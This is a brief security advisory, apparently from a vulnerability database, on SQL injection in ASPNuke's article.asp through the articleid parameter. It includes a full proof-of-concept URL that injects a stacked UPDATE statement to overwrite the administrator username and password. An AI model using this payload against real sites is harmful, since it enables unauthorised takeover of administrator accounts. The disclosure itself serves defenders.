|
ASPNuke Article.ASP SQL Injection Vulnerability
No exploit is required. The following proof of concept is available: http://www.example.com/module/article/article/article.asp?articleid='[SQL_INJECTION] oil_karchack has supplied the following proof of concept exploit that will set the administrator username and password: http://www.example.com/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf 4ca831485ba0da56328f818763ed34c72ca96533802c' , username='trapset'%20where%20userID=1%20-- |
|
|
Privacy Statement |